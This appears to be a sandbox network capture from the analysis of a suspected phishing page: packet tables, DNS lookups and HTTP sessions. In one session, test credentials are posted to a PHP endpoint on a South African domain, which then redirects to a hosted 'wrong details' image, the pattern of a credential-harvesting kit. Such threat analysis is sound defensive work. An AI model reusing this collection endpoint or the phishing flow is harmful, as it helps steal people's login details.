                                              Apr 3, 2025 00:54:46.475861073 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:46.475899935 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:56.897583008 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:56.897654057 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:56.897741079 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:56.897898912 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:56.897912979 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:57.094075918 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:57.094501972 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:57.094536066 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:07.094074965 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:07.094228983 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:07.094392061 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:08.478796959 CEST49755443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:08.478828907 CEST44349755142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:27.428342104 CEST49711443192.168.2.440.126.24.148
                                              Apr 3, 2025 00:55:27.428342104 CEST4971380192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:55:27.518615961 CEST8049713199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:55:27.518723965 CEST8049713199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:55:27.518908024 CEST4971380192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:55:27.529210091 CEST4434971140.126.24.148192.168.2.4
                                              Apr 3, 2025 00:55:27.529324055 CEST49711443192.168.2.440.126.24.148
                                              Apr 3, 2025 00:55:36.990377903 CEST49708443192.168.2.452.113.196.254
                                              Apr 3, 2025 00:55:56.959657907 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:56.959697962 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:56.959755898 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:56.959901094 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:56.959911108 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:57.151628971 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:55:57.151988983 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:55:57.152003050 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:56:07.146620035 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:56:07.146704912 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:56:07.146773100 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:56:08.417891026 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:56:08.476213932 CEST49770443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:56:08.476248980 CEST44349770142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:56:09.530155897 CEST44349737204.79.197.222192.168.2.4
                                              Apr 3, 2025 00:56:09.530237913 CEST49737443192.168.2.4204.79.197.222
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 3, 2025 00:53:52.568958998 CEST53597051.1.1.1192.168.2.4
                                              Apr 3, 2025 00:53:52.724831104 CEST53501431.1.1.1192.168.2.4
                                              Apr 3, 2025 00:53:53.351161003 CEST53603201.1.1.1192.168.2.4
                                              Apr 3, 2025 00:53:53.491008043 CEST53619641.1.1.1192.168.2.4
                                              Apr 3, 2025 00:53:56.834608078 CEST5186953192.168.2.41.1.1.1
                                              Apr 3, 2025 00:53:56.834950924 CEST4938053192.168.2.41.1.1.1
                                              Apr 3, 2025 00:53:56.934385061 CEST53493801.1.1.1192.168.2.4
                                              Apr 3, 2025 00:53:56.943281889 CEST53518691.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:10.611242056 CEST53513301.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:13.303352118 CEST6326153192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:13.303467035 CEST6094153192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:14.120172024 CEST53609411.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:14.199862957 CEST53632611.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:18.264987946 CEST5811553192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:18.264987946 CEST6268853192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:18.366414070 CEST53581151.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:18.366642952 CEST53626881.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:19.302402020 CEST5946453192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:19.302630901 CEST5371353192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:19.400589943 CEST53594641.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:19.403558016 CEST53537131.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:19.866523027 CEST6111653192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:19.866818905 CEST6159853192.168.2.41.1.1.1
                                              Apr 3, 2025 00:54:19.964107990 CEST53611161.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:19.968338013 CEST53615981.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:29.593296051 CEST53511271.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:52.144654036 CEST53650821.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:52.657938957 CEST53616051.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:55.294234037 CEST53560451.1.1.1192.168.2.4
                                              Apr 3, 2025 00:54:58.981129885 CEST138138192.168.2.4192.168.2.255
                                              Apr 3, 2025 00:55:23.610117912 CEST53609091.1.1.1192.168.2.4
                                              Apr 3, 2025 00:56:10.325462103 CEST53501121.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 3, 2025 00:53:56.834608078 CEST192.168.2.41.1.1.10x1197Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:53:56.834950924 CEST192.168.2.41.1.1.10xbe73Standard query (0)www.google.com65IN (0x0001)false
                                              Apr 3, 2025 00:54:13.303352118 CEST192.168.2.41.1.1.10xf88Standard query (0)thynkfinance.co.zaA (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:13.303467035 CEST192.168.2.41.1.1.10xd0a4Standard query (0)thynkfinance.co.za65IN (0x0001)false
                                              Apr 3, 2025 00:54:18.264987946 CEST192.168.2.41.1.1.10xbef8Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:18.264987946 CEST192.168.2.41.1.1.10x2987Standard query (0)i.ibb.co65IN (0x0001)false
                                              Apr 3, 2025 00:54:19.302402020 CEST192.168.2.41.1.1.10x6477Standard query (0)simgbb.comA (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.302630901 CEST192.168.2.41.1.1.10xeda9Standard query (0)simgbb.com65IN (0x0001)false
                                              Apr 3, 2025 00:54:19.866523027 CEST192.168.2.41.1.1.10x91afStandard query (0)simgbb.comA (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.866818905 CEST192.168.2.41.1.1.10x8e3dStandard query (0)simgbb.com65IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 3, 2025 00:53:56.934385061 CEST1.1.1.1192.168.2.40xbe73No error (0)www.google.com65IN (0x0001)false
                                              Apr 3, 2025 00:53:56.943281889 CEST1.1.1.1192.168.2.40x1197No error (0)www.google.com142.250.80.4A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:14.199862957 CEST1.1.1.1192.168.2.40xf88No error (0)thynkfinance.co.za154.0.165.249A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:18.366414070 CEST1.1.1.1192.168.2.40xbef8No error (0)i.ibb.co207.174.26.219A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.400589943 CEST1.1.1.1192.168.2.40x6477No error (0)simgbb.com172.67.131.251A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.400589943 CEST1.1.1.1192.168.2.40x6477No error (0)simgbb.com104.21.4.104A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.403558016 CEST1.1.1.1192.168.2.40xeda9No error (0)simgbb.com65IN (0x0001)false
                                              Apr 3, 2025 00:54:19.964107990 CEST1.1.1.1192.168.2.40x91afNo error (0)simgbb.com172.67.131.251A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.964107990 CEST1.1.1.1192.168.2.40x91afNo error (0)simgbb.com104.21.4.104A (IP address)IN (0x0001)false
                                              Apr 3, 2025 00:54:19.968338013 CEST1.1.1.1192.168.2.40x8e3dNo error (0)simgbb.com65IN (0x0001)false
                                              • thynkfinance.co.za
                                              • i.ibb.co
                                                • simgbb.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449743154.0.165.2494437580C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2025-04-02 22:54:15 UTC802OUTPOST /admin/save/mer.php HTTP/1.1
                                              Host: thynkfinance.co.za
                                              Connection: keep-alive
                                              Content-Length: 56
                                              Cache-Control: max-age=0
                                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Origin: null
                                              Content-Type: application/x-www-form-urlencoded
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br, zstd
                                              Accept-Language: en-US,en;q=0.9
                                              2025-04-02 22:54:15 UTC56OUTData Raw: 32 32 32 32 3d 72 39 6c 38 33 72 25 34 30 74 6d 70 61 2e 63 6f 26 31 31 31 31 3d 2e 56 25 32 36 6e 25 35 44 57 79 25 32 43 54 72 25 32 34 25 32 35 53 63 66 25 37 43 2e
                                              Data Ascii: 2222=r9l83r%40tmpa.co&1111=.V%26n%5DWy%2CTr%24%25Scf%7C.
                                              2025-04-02 22:54:18 UTC315INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Wed, 02 Apr 2025 22:54:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Location: https://i.ibb.co/nBXYTs4/wrong-details.jpg
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              X-Server-Powered-By: nginx-ah


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449744207.174.26.2194437580C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2025-04-02 22:54:18 UTC715OUTGET /nBXYTs4/wrong-details.jpg HTTP/1.1
                                              Host: i.ibb.co
                                              Connection: keep-alive
                                              Cache-Control: max-age=0
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br, zstd
                                              Accept-Language: en-US,en;q=0.9
                                              2025-04-02 22:54:18 UTC380INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 02 Apr 2025 22:54:18 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 42786
                                              Connection: close
                                              Last-Modified: Mon, 18 Dec 2023 06:24:29 GMT
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Cache-Control: public
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, OPTIONS
                                              Accept-Ranges: bytes
                                              2025-04-02 22:54:18 UTC3716INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 01 01 12 00 03 00 00 00 01 00 01 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 02 12 04 5f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03
                                              Data Ascii: JFIF``"ExifMM*CC_"
                                              2025-04-02 22:54:18 UTC4096INData Raw: 44 50 cb b7 6e dd bf c5 5e e7 fb 67 7c 3e d6 fc 7f fb 32 dd e9 3a 0e 97 71 ab 6b 11 bd 94 a9 67 0b a2 bc 9e 5c a8 cc 14 bb 2a fd d0 df 79 b6 d0 06 cf c3 9f da a7 43 f1 f7 8c a2 f0 ec fa 57 89 bc 2f ae dc c1 f6 8b 3b 3d 7a c3 ec ad 7d 1a fd e6 89 83 32 3e dc fc ca 1b 72 ff 00 76 ba cd 17 e2 df 85 fc 51 e2 7b ad 0f 4d f1 37 87 f5 0d 66 cc 1f b4 58 db 6a 30 cb 75 6f 8e bb e3 56 2c bf 88 af 08 d7 7e 1f 78 db f6 8f f8 91 e1 ad 46 e7 c3 37 de 03 d2 fc 1b 61 76 b1 4b a8 5c 45 25 dd e5 d4 f0 79 6b b5 62 66 55 45 fb db 99 be f7 f0 d7 19 f0 ff 00 f6 78 f1 85 c4 3f 0d 7c 3a be 07 ff 00 84 56 fb c0 b7 ef 71 a8 f8 9c 4b 07 97 7c bb 1d 4b 44 c8 de 6b 34 8c ca cd bd 57 ee d0 07 d4 92 7c 6b f0 78 f1 45 c6 8a de 2c f0 df f6 d5 9a 33 cf a7 ff 00 6a 42 2e a0 55 19 66 78 b7
                                              Data Ascii: DPn^g|>2:qkg\*yCW/;=z}2>rvQ{M7fXj0uoV,~xF7avK\E%ykbfUEx?|:VqK|KDk4W|kxE,3jB.Ufx
                                              2025-04-02 22:54:18 UTC4096INData Raw: f0 b2 5f fe 81 97 5f f7 f5 2b c3 ff 00 62 cf f9 37 bb 1f fb 0b eb 5f fa 76 bc af 56 a2 5f 10 1b 5f f0 b2 5f fe 81 97 5f f7 f5 28 ff 00 85 92 ff 00 f4 0c ba ff 00 bf a9 58 b4 50 06 d7 fc 2c 97 ff 00 a0 65 d7 fd fd 4a 3f e1 64 bf fd 03 2e bf ef ea 56 2d 14 01 b5 ff 00 0b 25 ff 00 e8 19 75 ff 00 7f 52 8f f8 59 2f ff 00 40 cb af fb fa 95 8b 45 00 6d 7f c2 c9 7f fa 06 5d 7f df d4 a3 fe 16 4b ff 00 d0 32 eb fe fe a5 62 d1 40 1b 5f f0 b2 5f fe 81 97 5f f7 f5 28 ff 00 85 92 ff 00 f4 0c ba ff 00 bf a9 58 b4 50 06 d7 fc 2c 87 ff 00 a0 65 d7 fd fd 4a 3f e1 64 bf fd 03 2e bf ef ea 56 2d 14 01 b5 ff 00 0b 25 ff 00 e8 19 75 ff 00 7f 52 8f f8 59 2f ff 00 40 cb af fb fa 95 8b 45 00 6d 7f c2 c9 7f fa 06 5d 7f df d4 a3 fe 16 4b ff 00 d0 32 eb fe fe a5 62 d1 40 1b 5f f0 b2
                                              Data Ascii: __+b7_vV____(XP,eJ?d.V-%uRY/@Em]K2b@___(XP,eJ?d.V-%uRY/@Em]K2b@_
                                              2025-04-02 22:54:18 UTC4096INData Raw: 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 47 d9 d4 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a3 de 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 f5 2b 97 de 0a 28 a2 82 7d 42 8a 28 a0 02 8a 28 a0 3d de 81 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 5b 5e 08 ff 00 90 b4 9f f5 c8 ff 00 35 ac
                                              Data Ascii: Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@QG((((((((((+(}B((=EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP[^5
                                              2025-04-02 22:54:18 UTC4096INData Raw: 6b f6 c2 bf 02 ff 00 e0 b1 fa a3 ea 5f f0 51 4f 88 1b bf e5 dd ed 60 53 9d df 76 d6 2f f3 ff 00 01 a3 23 b3 ad 79 74 37 f1 3a b7 26 5a a1 dd 9f 2f 8e 6b b4 fd 9d fc 20 be 3e fd a0 3c 0f a1 ba ee 8f 56 d7 ac ac dc 7f b2 f3 a2 b7 fe 3b ba b8 bc d7 b6 7f c1 38 f4 f5 d5 3f 6e cf 85 71 32 ef 5f f8 48 2d dd 87 de fb ac cd bb fe 03 b7 75 7d 4d 7d 29 36 7e 17 94 53 e7 c6 53 5f de 47 f4 49 6d 0a db db c7 1a ae c5 8d 55 54 7f c0 57 e5 a9 28 ff 00 96 7f e7 fb d4 57 e7 cf e2 e6 3f ae 28 d3 e5 82 51 0a fe 7a ff 00 e0 a9 7e 0a 1e 03 ff 00 82 80 fc 51 b3 8a 3f 2a 1b 8d 5b ed a0 0f bb fe 90 89 3b 7f e3 d2 b5 7f 42 95 f8 4f ff 00 05 ca d2 d7 4c ff 00 82 89 78 99 97 fe 5e b4 ed 3e 76 3b 76 fc df 67 45 ff 00 d9 6b d9 c8 a5 6a cd 1f 9a f8 a1 4e f9 7c 27 e6 7c 8c bf fb 2d 7d
                                              Data Ascii: k_QO`Sv/#yt7:&Z/k ><V;8?nq2_H-u}M})6~SS_GImUTW(W?(Qz~Q?*[;BOLx^>v;vgEkjN|'|-}
                                              2025-04-02 22:54:18 UTC4096INData Raw: 87 94 2f 52 47 e5 de 27 67 10 aa e1 83 a4 ef cb b8 dd f5 f5 a7 fc 11 27 e1 bc 9e 3c ff 00 82 82 78 5e e7 ca 66 b7 f0 dd ad d6 ab 3b ff 00 0a ed 89 91 3f f2 23 ad 7c 93 5f ad 9f f0 6e ff 00 ec ef 37 87 fe 1e f8 bb e2 5d f5 bb 42 de 20 95 74 8d 35 dd 7f e5 8c 4d ba 57 5f f6 5a 4d aa df ee 35 7a 79 85 6e 4c 3b 3e 37 82 f2 f9 62 b3 3a 71 5f 67 53 ec af f8 28 07 fc 99 2f c5 5f fb 16 6f bf f4 43 57 f3 97 ff 00 2c ab fa 5e fd a2 3e 15 cd f1 c3 e0 3f 8b bc 1f 6f 79 1e 9f 37 89 b4 9b 8d 39 2e 64 46 91 61 69 51 94 33 2a b2 ee db bb 76 dd df c3 5f 99 ff 00 f1 0d df 89 bc bf f9 2a 1a 0f aa ff 00 c4 a2 5f fe 3b 5e 36 4f 8c a5 49 38 cd ee 7e 8d e2 07 0f e3 b1 f5 e9 cb 0b 4e ea 27 e6 8e 7f da a3 b7 fe 83 5f a5 7f f1 0d c7 89 bf e8 a8 68 3f f8 27 97 ff 00 8e d1 ff 00 10
                                              Data Ascii: /RG'g'<x^f;?#|_n7]B t5MW_ZM5zynL;>7b:q_gS(/_oCW,^>?oy79.dFaiQ3*v_*_;^6OI8~N'_h?'
                                              2025-04-02 22:54:18 UTC4096INData Raw: c5 f7 a8 03 eb 2a 2b 90 f8 3b e0 3d 5b e1 fe 87 71 6f aa 78 b3 50 f1 6f 9d 2e f8 2e 6e d1 56 48 d3 6a ae dd ca cd bb e6 f9 b7 7c bf 7a ba fa 00 28 a2 8a 00 2b ca 7f 68 8f da 52 4f d9 ff 00 c4 be 19 b7 b8 d1 7e dd a6 6b d7 1f 67 96 f7 ed 5e 5f d9 5b 72 ab 7c bb 5b 76 d5 65 6f bc b5 ea d5 e3 7f b7 67 c3 7f f8 58 9f b3 de a8 d0 c7 be f3 45 65 bf 80 85 dc df 2f ca ca bf dd f9 59 9b fe 03 40 1e c5 1d c2 c9 6e b2 2b 7e ed 97 72 bf f0 ed fb db ab c3 7e 07 fe db 16 3f 19 be 34 6a 9e 13 5d 25 6c 12 d5 65 6b 3b b3 79 e6 35 d6 c6 da df 26 c5 da cc bf 37 de 6f e2 aa fa 5f ed 00 26 fd 85 9b c5 12 4d ba fa 3d 25 ac 98 bb 7c cd 71 fe a9 bf e0 5b be 6f f8 0d 78 3c 7f 0f e6 fd 9b f4 bf 84 3f 10 02 f9 72 5e 4a cb a9 1d bf 36 d9 59 9b 9f e1 ff 00 57 2b 2f fc 06 80 3e d0 f8
                                              Data Ascii: *+;=[qoxPo..nVHj|z(+hRO~kg^_[r|[veogXEe/Y@n+~r~?4j]%lek;y5&7o_&M=%|q[ox<?r^J6YW+/>
                                              2025-04-02 22:54:18 UTC4096INData Raw: df 37 f7 b7 3b 7f c0 56 bd 2b fe 0a 75 ff 00 26 e3 0f fd 86 6d ff 00 f4 09 6b df 34 bf 0f d9 68 9b fe c3 63 67 67 e6 7c cf e4 40 b1 ee ff 00 7b 6a ae ea 93 52 d2 ad 75 8b 7f 26 f2 d6 de ea 1d db b6 4c 8b 22 ee fe f6 d6 f9 68 02 2d 03 fe 45 fb 1f fa f6 4f fd 05 6b e4 ef 84 fe 33 8f f6 33 f8 ed e3 2d 37 c6 16 f7 96 fa 2f 88 2e 3e d1 65 aa 24 0d 24 5b 55 99 97 76 d5 6f bc ac bf ee b2 d7 d7 ca bb 57 6a ae d5 fb aa 05 57 d4 b4 7b 5d 62 15 8e f2 d2 de ee 3f bc a9 2c 4b 22 ff 00 df 2c b4 01 f2 9f ed 47 f1 d3 4f fd a9 7c 3f a7 f8 0f e1 fc 37 5a f5 e6 a5 78 93 dc 5d a4 0d 1c 16 a8 bb 97 e6 66 0b fd ed cc df 75 55 7f 8b 77 cb a7 ff 00 05 04 f0 c2 f8 37 f6 42 f0 ee 92 ad e6 2e 9b a8 d9 5b ef c7 de db 04 eb bb ff 00 1d af a5 74 bf 0f e9 fa 18 6f b0 d9 59 d9 ee f9 5b
                                              Data Ascii: 7;V+u&mk4hcgg|@{jRu&L"h-EOk33-7/.>e$$[UvoWjW{]b?,K",GO|?7Zx]fuUw7B.[toY[
                                              2025-04-02 22:54:18 UTC4096INData Raw: 8b 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28
                                              Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                              2025-04-02 22:54:18 UTC4096INData Raw: ff 00 7f 7f fb 1a 00 86 8a 9b fb 13 50 ff 00 9f 58 7f ef ef ff 00 63 47 f6 26 a1 ff 00 3e b0 ff 00 df df fe c6 80 21 a2 a6 fe c4 d4 3f e7 d6 1f fb fb ff 00 d8 d1 fd 89 a8 7f cf ac 3f f7 f7 ff 00 b1 a0 08 68 a9 bf b1 35 0f f9 f5 87 fe fe ff 00 f6 34 7f 62 6a 1f f3 eb 0f fd fd ff 00 ec 68 02 1a 2a 6f ec 4d 43 fe 7d 61 ff 00 bf bf fd 8d 1f d8 9a 87 fc fa c3 ff 00 7f 7f fb 1a 00 86 8a 9b fb 13 50 ff 00 9f 58 7f ef ef ff 00 63 47 f6 26 a1 ff 00 3e b0 ff 00 df df fe c6 80 21 a2 a6 fe c4 d4 3f e7 d6 1f fb fb ff 00 d8 d1 fd 89 a8 7f cf ac 3f f7 f7 ff 00 b1 a0 08 68 a9 bf b1 35 0f f9 f5 87 fe fe ff 00 f6 34 7f 62 6a 1f f3 eb 0f fd fd ff 00 ec 68 02 1a 2a 6f ec 4d 43 fe 7d 61 ff 00 bf bf fd 8d 1f d8 9a 87 fc fa c3 ff 00 7f 7f fb 1a 00 86 8a 9b fb 13 50 ff 00 9f 58
                                              Data Ascii: PXcG&>!??h54bjh*oMC}aPXcG&>!??h54bjh*oMC}aPX


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449746207.174.26.2194437580C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2025-04-02 22:54:19 UTC604OUTGET /favicon.ico HTTP/1.1
                                              Host: i.ibb.co
                                              Connection: keep-alive
                                              sec-ch-ua-platform: "Windows"
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                              sec-ch-ua-mobile: ?0
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://i.ibb.co/nBXYTs4/wrong-details.jpg
                                              Accept-Encoding: gzip, deflate, br, zstd
                                              Accept-Language: en-US,en;q=0.9
                                              2025-04-02 22:54:19 UTC200INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 02 Apr 2025 22:54:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://simgbb.com/images/favicon.png
                                              2025-04-02 22:54:19 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
